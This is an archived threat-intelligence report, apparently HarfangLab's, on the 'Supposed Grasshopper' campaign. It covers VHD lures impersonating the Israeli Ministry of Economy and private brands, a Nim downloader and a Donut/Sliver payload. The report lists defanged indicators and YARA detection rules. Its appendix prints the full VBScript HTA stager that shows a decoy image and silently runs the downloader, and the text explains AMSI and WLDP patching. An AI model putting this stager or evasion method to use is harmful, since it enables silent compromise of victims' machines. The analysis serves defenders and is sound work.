{
	"id": "9b160774-cc02-42f7-aa66-498fd36c7222",
	"created_at": "2026-04-06T00:10:41.730554Z",
	"updated_at": "2026-04-10T03:22:13.232692Z",
	"deleted_at": null,
	"sha1_hash": "082e541901faa3ec0e6e7d7c6b12b42de0dc22a2",
	"title": "Supposed Grasshopper: operators impersonate Israeli government and private companies to deploy open-source malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2055331,
	"plain_text": "Supposed Grasshopper: operators impersonate Israeli government\r\nand private companies to deploy open-source malware\r\nPublished: 2024-06-28 · Archived: 2026-04-05 13:51:12 UTC\r\nHome » Inside the Lab » Supposed Grasshopper: operators impersonate Israeli government and private companies\r\nto deploy open-source malware\r\nPublished on 28 June, 2024 14min\r\nIdentifier: TRR240601.\r\nSummary\r\nhttps://harfanglab.io/insidethelab/supposed-grasshopper-operators-impersonate-israeli-gov-private-companies-deploy-open-source-malware/\r\nPage 1 of 11\n\nHunting for malicious infrastructure possibly targeting the Israeli government, we identified a previously\r\nunreported, long-standing and suspicious domain. The latter is still active at the time of this report, and is\r\nleveraged as a command and control server (C2), as part of an infection chain themed around an Israeli\r\ngovernment entity.\r\nWe set on to analyse the toolset used in the context of this infection chain, and discovered that it is a mix of\r\npublicly available malware with light custom development serving as a glue between the components. Pivoting\r\nfrom identified infrastructure, we additionally discovered that attacks leveraging common techniques were\r\nconducted against private companies in late 2023.\r\nAttack campaigns that we could identify and link together seem highly targeted, leverage target-specific\r\ninfrastructure and custom WordPress websites as a payload delivery mechanism, but affect a variety of entities\r\nacross unrelated verticals, and rely on well-known open-source malware.\r\nWe believe it is possible that those attack campaigns could actually be part of legitimate penetration testing\r\noperations. However, because none of the infrastructure and toolset pointed at a legitimate penetration testing\r\ncompany, we could not further confirm this hypothesis and believe the identified activity deserved to be described\r\nto the cybersecurity community.\r\nInfection chain\r\nDelivery\r\nWe set on to analyse the infection chain that we identified and that is themed around an Israeli government entity.\r\nWe could not identify the delivery source of the initial payload that we retrieved (a VHD file named\r\nvacation5.vhd , see Initial payload title below).\r\nHowever, later pivoting from identified infrastructure and toolset, we identified further similar attack campaigns\r\n(see Infrastructure title later). On two other identified attack campaigns, the initial payloads (VHD files) were\r\nseemingly distributed from specifically crafted WordPress websites, using a typical drive-by download scheme:\r\nhxxps://portal.operative-sintecmedia[.]com : on November 6, 2023, this custom WordPress website\r\n(see Fig. 1) contained a button linking to a VHD file, hxxps://portal.operative-sintecmedia[.]com/report.vhd\r\nhxxps://carls.employers-view[.]com : on November 11, 2023, this custom WordPress website contained\r\na button linking to a URL at login.carlsberg[.]site . On November 14, 2023, another hostname of the\r\ncarlsberg[.]site domain exposed a VHD file URL,\r\nhxxps://employees.carlsberg[.]site/voucher.vhd : (this URL has been submitted to an online\r\nmultiscanner service).\r\nhttps://harfanglab.io/insidethelab/supposed-grasshopper-operators-impersonate-israeli-gov-private-companies-deploy-open-source-malware/\r\nPage 2 of 11\n\nFigure 1 – Specifically crafted delivery WordPress website\r\nAs a result, we believe with medium confidence that the analysed initial VHD file payload has also been delivered\r\nthrough a custom WordPress website as part of a drive-by download scheme.\r\nInitial payload\r\nThe infection chain begins with a VHD file (SHA-256\r\na8948dd8e4e4961da537b40bf7e313f0358510f93e25dea1a2fafd522bfd0e84 ) – a format which represents a virtual\r\nhard drive that can be mounted on Windows without the need for additional tools. This disk named\r\nvacation5.vhd contains several files, although all but one are hidden:\r\nhagrala.lnk\r\n1\r\n, the only visible file (and its icon, result.ico),\r\nhagrala.hta , to which the link points,\r\nwinin.exe (along with libcrypto-1_1-x64.dll and libssl-1_1-x64.dll ), the first-stage malware and\r\nits two legitimate code libraries,\r\ncacert.pem , the GlobalSign root CA R1, ( 04:00:00:00:00:01:15:4b:5a:c3:94 ) certificate used by the\r\nfirst-stage malware,\r\nresult.jpg , a decoy image (see Fig. 2).\r\nWhen victims double-click on the VHD file, they are presented with a link to the HTA file whose icon is the\r\nminiature of an image. Following the shortcut causes hagrala.hta to be executed, with the following effects:\r\nThe decoy file (see Figure 1) is displayed so the victim believes they clicked on an image file,\r\nAll the files related to the first-stage malware are moved to the %TEMP% folder,\r\nhttps://harfanglab.io/insidethelab/supposed-grasshopper-operators-impersonate-israeli-gov-private-companies-deploy-open-source-malware/\r\nPage 3 of 11\n\nThe first-stage malware is launched.\r\nThe full contents of this HTA file can be found in the appendix. We were not able to identify any other similar\r\nsample, and despite the presence of numerous comments in the VBScript source code, it doesn’t appear to come\r\nfrom any public source. We believe this piece to be a custom development by the threat actor.\r\nFigure 2 – Decoy image displayed when the HTA is executed. The text reads: “Surprise Vacation.\r\nSorry, you didn’t win” and shows the logo of the Israeli Ministry of Economy and Industry\r\nFirst-stage Nim downloader\r\nThis malware sample (SHA-256 d891f4339354d3f4c4b834e781fa4eaca2b59c6a8ee9340cc489ab0023e034c8 ) is a\r\nrudimentary downloader, written in Nim and tasked with downloading the second-stage malware from a staging\r\nserver controlled by the attacker. It was compiled from the following path: C:\\Users\\or\\Desktop\\nim-2.0.0\\bin\\helo.nim .\r\nThe sample establishes a connection to hxxps://auth.economy-gov-il[.]com/SUPPOSED_GRASSHOPPER.bin?\r\ntoken=ghhdjsdgsd – it uses the attached cacert.pem file (GlobalSign’s root CA R1) to initialize its SSL context,\r\nbut our testing indicates that if this was supposed to be a validation mechanism, it wasn’t implemented properly as\r\nthe malware accepts SSL certificates signed by other CAs.\r\nThe contents of the remote file are kept in memory and not saved on the victim’s hard drive. The downloader\r\nallocates a new executable buffer with VirtualAllocEx and jumps to the first byte of the next stage.\r\nWe believe the Nim downloader was created by the attackers too, as we were only able to find two additional\r\nsamples (SHA-256 c21ad804c22a67ddb62adf5f6153a99268f0b26e359b842ebeabcada824c277f and\r\nd7a66f8529f1c32342c4ed06c4a4750a93bd44161f578e5b94d6d30f7cc41581 ).\r\nFinal payload: Donut \u0026 Sliver\r\nhttps://harfanglab.io/insidethelab/supposed-grasshopper-operators-impersonate-israeli-gov-private-companies-deploy-open-source-malware/\r\nPage 4 of 11\n\nThe last stage downloaded from the remote server (SHA-256\r\n2070dd30e87c492e6f44ebb0a37bcae7cb309de61e1c4e6223df090bb26b3cd7 , SUPPOSED_GRASSHOPPER.bin ) is a file\r\nweighing approximately 15MB. It is a combination of two open-source projects:\r\nDonut, a position-independent shellcode generation framework,\r\nSliver, a publicly available Golang trojan developed as a free alternative to CobaltStrike.\r\nIn the context of this attack and after its initialization phase (which includes self-decoding as well as resolving\r\nrequired functions via API hashing), Donut is configured to:\r\nHinder the operations of installed security products by tampering with AMSI (Antimalware Scan Interface)\r\nand WLDP (Windows Lockdown Policy):\r\nPatch the AmsiScanBuffer and AmsiScanBytes functions so they return immediately,\r\nDisable the WldpIsClassInApprovedList and WldpQueryDynamicCodeTrust functions the same\r\nway.\r\nMap and execute the embedded payload.\r\nThe final payload (see Fig. 3) is an instance of Sliver using www.economy-gov-il[.]com (which resolved to\r\n157.90.153[.]59 at the time of the attack) as a C2 server. From there, the attacker has full control of the victim’s\r\nmachine and can use all of Sliver’s features to perform any desired actions on objective.\r\nFigure 3 – Overview of the executable part of the analysed infection chain\r\nInfrastructure\r\nFurther pivoting from the infrastructure and toolset we analysed, we could identify further infrastructure that we\r\nbelieve with medium to high confidence is leveraged for similar attack campaigns by the same operators (also see\r\nFig. 4):\r\nDomain or hostname\r\nDomain\r\nRegistrar\r\nDetails\r\neconomy-gov-il[.]com GoDaddy\r\nDomain registered on 2023-05-29. Used as a staging server\r\nby a Nim downloader and as a C2 server by a Sliver implant\r\nin the infection chain we analysed.\r\nhttps://harfanglab.io/insidethelab/supposed-grasshopper-operators-impersonate-israeli-gov-private-companies-deploy-open-source-malware/\r\nPage 5 of 11\n\nDomain or hostname\r\nDomain\r\nRegistrar\r\nDetails\r\nportal.operative-sintecmedia[.]com\r\nGoDaddy\r\nDomain registered on 2023-10-10. Used as a staging server\r\nby a Nim downloader of the same type that the one we\r\nanalysed, hosted a custom WordPress website (2023-11-04\r\nand 06) which further linked to a VHD file\r\n( hxxps://portal.operative-sintecmedia[.]com/report.vhd , 2023-11-06) and to\r\nlogin.microsofonlline[.]com (2023-11-04 and 06).\r\ncarlsberg[.]site GoDaddy\r\nDomain registered on 2023-10-05 (existed before, but\r\nregistrar changed at this date). The employees. and\r\nportal. hostnames resolved to the same IP address as\r\nportal.operative-sintecmedia[.]com . The employees.\r\nhostname exposed a VHD file\r\n( hxxps://employees.carlsberg[.]site/voucher.vhd ,\r\n2023-11-14).\r\ncarls.employers-view[.]com GoDaddy\r\nDomain registered on 2023-11-15. Hostname resolved to\r\nthe same IP address as employees.carlsberg[.]site in\r\nNovember 2023. Hosted a custom WordPress website\r\n(2023-11-11) which contained a link to\r\nlogin.carlsberg[.]site .\r\nlogin.microsofonlline[.]com GoDaddy\r\nDomain registered on 2023-10-01. The custom WordPress\r\nwebsite on portal.operative-sintecmedia[.]com contained a link to this domain (2023-\r\n11-04 and 06).\r\nUsing passive DNS data, we looked at the dates at which these domains were first and last seen to confirm their\r\ncorrelation:\r\nFigure 4 – Timeline representing the usage of the domains identified in this campaign, as well as\r\ntheir corresponding IP addresses\r\nhttps://harfanglab.io/insidethelab/supposed-grasshopper-operators-impersonate-israeli-gov-private-companies-deploy-open-source-malware/\r\nPage 6 of 11\n\nIt is interesting to note that the purple and green clusters appear to be impersonating well-known brands (the\r\nCarlsberg brewery and SintecMedia, the publisher of an AdTech solution named Operative). At least one of them,\r\nCarlsberg, doesn’t appear to be a very valuable target for the purposes of collecting intelligence. We also note that\r\nin the “lottery” campaign, based on the lure displayed to victims, the attackers were likely impersonating the\r\nIsraeli government to target individuals or local companies but likely not targeting the Israeli government itself.\r\nOn November 6 (but not the 4), 2023, the custom WordPress website at hxxps://portal.operative-sintecmedia[.]com contained a button linking to a VHD file ( hxxps://portal.operative-sintecmedia[.]com/report.vhd ). On November 4 and 6, 2023, the same specifically-crafted website also\r\ncontained a button linking to hxxps://login.microsofonlline[.]com/yPHnrlHf . One very interesting detail in\r\nthat on November 6, 2023 at 09:31 UTC and according to access attempt results from a scanning service, the latter\r\nURL redirected to Rick Astley’s “Never Gonna Give You Up” video (a trick known as “rickrolling” in the popular\r\nculture). We could not determine if this redirection was permanent, and if it was based on visitors’ IP address or\r\nnot – this could indeed still be a deceptive redirection made as part of a geofencing technique.\r\nConclusion\r\nParadoxically, this campaign is interesting due to its very limited scope and sharp targeting. To the best of our\r\nknowledge, only a handful of samples related to this cluster of activities exist, which hints at a small number of\r\nintrusion attempts. The toolchain used by the threat actor is composed primarily of open-source tools, and the only\r\nhomemade developments we could identify are the initial HTA file and the Nim downloader. The operators also\r\nput some notable efforts in acquiring dedicated infrastructure and deploying realistic WordPress website to deliver\r\npayloads. Overall, this campaign feels like it could realistically be the work of a small team.\r\nBecause of the rickrolling singularity that we detailed above, the fact that identified infrastructure targets a variety\r\nof entities across unrelated verticals, and the usage of widely-known open-source malware as final payloads, we\r\nbelieve with medium confidence that the described activities could be part of legitimate penetration testing\r\noperations.\r\nShould the described activities be part of penetration testing engagements, we would like to raise questions about\r\nthe standards and policies that are implemented by penetration testing companies: malicious payloads have been\r\nmade publicly available (and some of them are still being distributed), while nothing from the infrastructure or\r\ntoolset could be linked back to a legitimate penetration testing company from publicly available data and within a\r\nreasonable amount of time. This situation highlights the need for greater transparency, especially when taking into\r\nconsideration geopolitical contexts: impersonating or targeting government entities or critical infrastructure\r\nwithout explicit indications of a penetration test could potentially lead to unwanted responses and escalate\r\ntensions.\r\nRegardless of the intent, this cluster of activity illustrates once again that there is more than enough publicly-available tooling to instigate efficient operations without any financial means, Donut and Sliver being quite\r\nsophisticated tools on their own, and WordPress being just as realistic for corporate websites as for phishing and\r\npayload delivery. The adoption of widely available attack frameworks presents challenges for threat researchers,\r\nas it becomes increasingly difficult to pivot on these parts of the infection chain. This trend is likely to continue,\r\npotentially complicating future investigations and threat analysis efforts.\r\nhttps://harfanglab.io/insidethelab/supposed-grasshopper-operators-impersonate-israeli-gov-private-companies-deploy-open-source-malware/\r\nPage 7 of 11\n\nAppendix\r\nIndicators of compromise\r\nAssociated IOCs are also available on our GitHub repository.\r\nHashes (SHA-256)\r\na8948dd8e4e4961da537b40bf7e313f0358510f93e25dea1a2fafd522bfd0e84|Virtual Hard Disk file\r\n6fb531839410b65be4f4833d73f02429b4dba8ed56fa236cce76750b9a1be23b|HTA Stager\r\nd891f4339354d3f4c4b834e781fa4eaca2b59c6a8ee9340cc489ab0023e034c8|First-stage Nim downloader\r\nd7a66f8529f1c32342c4ed06c4a4750a93bd44161f578e5b94d6d30f7cc41581|First-stage Nim downloader\r\nc21ad804c22a67ddb62adf5f6153a99268f0b26e359b842ebeabcada824c277f|First-stage Nim downloader\r\n2070dd30e87c492e6f44ebb0a37bcae7cb309de61e1c4e6223df090bb26b3cd7|Donut and Sliver\r\nURLs\r\nhxxps://auth.economy-gov-il[.]com/SUPPOSED_GRASSHOPPER.bin?token=ghhdjsdgsd|NIM downloader target\r\nhxxps://portal.operative-sintecmedia[.]com/SAD_ATTENUATION.bin|NIM downloader target\r\nhxxps://portal.operative-sintecmedia[.]com/report.vhd|VHD distribution site\r\nhxxps://employees.carlsberg[.]site/voucher.vhd|VHD distribution site\r\nHostnames\r\nauth.economy-gov-il[.]com|Staging server\r\nwww.economy-gov-il[.]com|Sliver C2\r\nlogin.operative-sintecmedia[.]com|Related infrastructure\r\nportal.operative-sintecmedia[.]com|Related infrastructure\r\nlogin.carlsberg[.]site|Related infrastructure\r\nemployees.carlsberg[.]site|Related infrastructure\r\nportal.carlsberg[.]site|Related infrastructure\r\ncarls.employers-view[.]com|Related infrastructure\r\nlogin.microsofonlline[.]com|Related infrastructure\r\nYara rules\r\nrule Supposed_Grasshopper_Downloader\r\n{\r\n meta:\r\n description = \"Detects the Nim downloader from the Supposed Grasshopper campaign.\"\r\n references = \"TRR240601\"\r\n date = \"2024-06-20\"\r\n author = \"HarfangLab\"\r\nhttps://harfanglab.io/insidethelab/supposed-grasshopper-operators-impersonate-israeli-gov-private-companies-deploy-open-source-malware/\r\nPage 8 of 11\n\ncontext = \"file,memory\"\r\n strings:\r\n $pdb_path = \"C:\\\\Users\\\\or\\\\Desktop\\\\nim-\" ascii\r\n $code = \"helo.nim\" ascii\r\n $function_1 = \"DownloadExecute\" ascii fullword\r\n $function_2 = \"toByteSeq\" ascii fullword\r\n condition:\r\n uint16(0) == 0x5a4d and all of them\r\n}\r\nrule Donut_shellcode {\r\n meta:\r\n description = \"Detects Donut shellcode in memory.\"\r\n references = \"TRR240601\"\r\n date = \"2024-06-20\"\r\n author = \"HarfangLab\"\r\n context = \"memory\"\r\n strings:\r\n // mov rax, [rsp+arg_28] (or arg_20)\r\n // and dword ptr [rax], 0\r\n // xor eax, eax\r\n // retn\r\n $amsi_patch = { 48 8B 44 24 (28 | 30) 83 20 00 33 C0 C3 }\r\n // mov dword ptr [r8], 1\r\n // xor eax, eax\r\n // retn\r\n $wldp_patch = { 41 C7 00 01 00 00 00 33 C0 C3 }\r\n // mov eax, edx\r\n // sror ecx, 8\r\n // add ecx, r8d\r\n // mov edx, ebx\r\n // xor ecx, r9d\r\n // ror edx, 8\r\n // add edx, r9d\r\n // rol r8d, 3\r\n // xor edx, r10d\r\n // rol r9d, 3\r\n // xor r9d, edx\r\n // xor r8d, ecx\r\n // inc r10d\r\n // mov ebx, r11d\r\n // mov r11d, eax\r\n // cmp r10d, 1Bh\r\n $api_hashing = { 8B C2 C1 C9 08 41 03 C8 8B D3 41 33 C9 C1 CA 08 41 03 D1 41 C1 C0 03 41 33 D2 41 C1 C1\r\nhttps://harfanglab.io/insidethelab/supposed-grasshopper-operators-impersonate-israeli-gov-private-companies-deploy-open-source-malware/\r\nPage 9 of 11\n\n$loaded_dlls = \"ole32;oleaut32;wininet;mscoree;shell32\" ascii\r\n $function_1 = \"WldpQueryDynamicCodeTrust\" ascii\r\n $function_2 = \"WldpIsClassInApprovedList\" ascii\r\n $function_3 = \"AmsiInitialize\" ascii\r\n $function_4 = \"AmsiScanBuffer\" ascii\r\n $function_5 = \"AmsiScanString\" ascii\r\n condition:\r\n // Shellcode starts with a \"call\"\r\n uint8(0) == 0xE8 and\r\n (\r\n // Find either all the patching/decoding code or the suspicious strings\r\n (#amsi_patch \u003e 1 and $wldp_patch and $api_hashing) or\r\n ($loaded_dlls and all of ($function_*))\r\n )\r\n}\r\nContents of hagrala.hta :\r\n\u003cscript language=\"VBScript\"\u003e\r\n Sub MoveAndExecuteFile\r\n Dim objFSO, objShell\r\n Set objFSO = CreateObject(\"Scripting.FileSystemObject\")\r\n Set objShell = CreateObject(\"WScript.Shell\")\r\n objShell.Run \"result.jpg\", 0, False\r\n ' Specify the source file and destination directory\r\n Dim sourceFile, destinationFolder\r\n sourceFile = \"winin.exe\" ' Replace with the actual path to win.exe\r\n destinationFolder = CreateObject(\"WScript.Shell\").ExpandEnvironmentStrings(\"%Temp%\")\r\n ' Move cacert.pem to Temp\r\n sourceFile = \"cacert.pem\"\r\n objFSO.MoveFile sourceFile, destinationFolder \u0026 \"\" \u0026 sourceFile\r\n ' Move libcrypto-1_1-x64.dll to Temp\r\n sourceFile = \"libcrypto-1_1-x64.dll\"\r\n objFSO.MoveFile sourceFile, destinationFolder \u0026 \"\" \u0026 sourceFile\r\n ' Move libssl-1_1-x64.dll to Temp\r\n sourceFile = \"libssl-1_1-x64.dll\"\r\n objFSO.MoveFile sourceFile, destinationFolder \u0026 \"\" \u0026 sourceFile\r\n ' Check if the source file exists\r\n sourceFile = \"winin.exe\" ' Replace with the actual path to win.exe\r\nhttps://harfanglab.io/insidethelab/supposed-grasshopper-operators-impersonate-israeli-gov-private-companies-deploy-open-source-malware/\r\nPage 10 of 11\n\nIf objFSO.FileExists(sourceFile) Then\r\n ' Check if the destination folder exists; if not, create it\r\n If Not objFSO.FolderExists(destinationFolder) Then\r\n objFSO.CreateFolder(destinationFolder)\r\n End If\r\n ' Move the file\r\n objFSO.MoveFile sourceFile, destinationFolder \u0026 \"winin.exe\"\r\n ' Execute the moved file\r\n objShell.Run \"\"\"\" \u0026 destinationFolder \u0026 \"winin.exe\"\"\", 0, False\r\n ' Close the HTA application after moving and executing the file\r\n window.Close\r\n Else\r\n MsgBox \"Source file not found.\", vbExclamation, \"File Move and Execute\"\r\n End If\r\n End Sub\r\n ' Call the MoveAndExecuteFile subroutine when the HTA is loaded\r\n MoveAndExecuteFile\r\n\u003c/script\u003e\r\nSource: https://harfanglab.io/insidethelab/supposed-grasshopper-operators-impersonate-israeli-gov-private-companies-deploy-open-source-mal\r\nware/\r\nhttps://harfanglab.io/insidethelab/supposed-grasshopper-operators-impersonate-israeli-gov-private-companies-deploy-open-source-malware/\r\nPage 11 of 11",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://harfanglab.io/insidethelab/supposed-grasshopper-operators-impersonate-israeli-gov-private-companies-deploy-open-source-malware/"
	],
	"report_names": [
		"supposed-grasshopper-operators-impersonate-israeli-gov-private-companies-deploy-open-source-malware"
	],
	"threat_actors": [],
	"ts_created_at": 1775434241,
	"ts_updated_at": 1775791333,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/082e541901faa3ec0e6e7d7c6b12b42de0dc22a2.pdf",
		"text": "https://archive.orkl.eu/082e541901faa3ec0e6e7d7c6b12b42de0dc22a2.txt",
		"img": "https://archive.orkl.eu/082e541901faa3ec0e6e7d7c6b12b42de0dc22a2.jpg"
	}
}